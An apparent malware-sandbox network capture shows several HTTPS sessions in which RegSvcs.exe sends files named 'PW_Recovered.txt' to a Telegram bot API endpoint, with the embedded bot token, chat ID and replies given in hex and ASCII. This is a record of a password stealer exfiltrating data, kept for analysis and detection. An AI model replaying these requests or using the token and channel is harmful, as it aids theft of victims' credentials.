                                                                          2024-09-19 10:22:34 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 36 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12764,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          43192.168.2.561562149.154.167.2204431488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:22:38 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dcdee3d2d3270d
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:22:38 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 65 65 33 64 32 64 33 32 37 30 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 30 34
                                                                          Data Ascii: --------------------------8dcdee3d2d3270dContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:04
                                                                          2024-09-19 10:22:38 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:22:38 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:22:38 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 36 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12765,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          44192.168.2.561563149.154.167.2204435688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:22:38 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dcdc15e6f642c6
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:22:38 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 63 31 35 65 36 66 36 34 32 63 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 31 37
                                                                          Data Ascii: --------------------------8dcdc15e6f642c6Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:17
                                                                          2024-09-19 10:22:39 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:22:38 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:22:39 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 36 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12766,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          45192.168.2.561566149.154.167.2204435688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:22:42 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dcde35e0cc7c14
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:22:42 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 65 33 35 65 30 63 63 37 63 31 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 31 37
                                                                          Data Ascii: --------------------------8dcde35e0cc7c14Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:17
                                                                          2024-09-19 10:22:42 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:22:42 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 562
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:22:42 UTC562INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 36 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12767,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          46192.168.2.561567149.154.167.2204431488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:22:42 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dce1e59cb38a86
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:22:42 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 31 65 35 39 63 62 33 38 61 38 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 30 34
                                                                          Data Ascii: --------------------------8dce1e59cb38a86Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:04
                                                                          2024-09-19 10:22:42 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:22:42 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:22:42 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 36 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12768,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          47192.168.2.561570149.154.167.2204431488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:22:46 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dce2c4fd9d50bb
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:22:46 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 32 63 34 66 64 39 64 35 30 62 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 30 34
                                                                          Data Ascii: --------------------------8dce2c4fd9d50bbContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:04
                                                                          2024-09-19 10:22:46 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:22:46 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:22:46 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 36 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12769,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          48192.168.2.561571149.154.167.2204435688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:22:46 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dcdf23b64c0193
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:22:46 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 66 32 33 62 36 34 63 30 31 39 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 31 37
                                                                          Data Ascii: --------------------------8dcdf23b64c0193Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:17
                                                                          2024-09-19 10:22:46 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:22:46 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:22:46 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 37 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12770,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          49192.168.2.561574149.154.167.2204431488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:22:50 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dce3488763ca5d
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:22:50 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 33 34 38 38 37 36 33 63 61 35 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 30 34
                                                                          Data Ascii: --------------------------8dce3488763ca5dContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:04
                                                                          2024-09-19 10:22:50 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:22:50 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
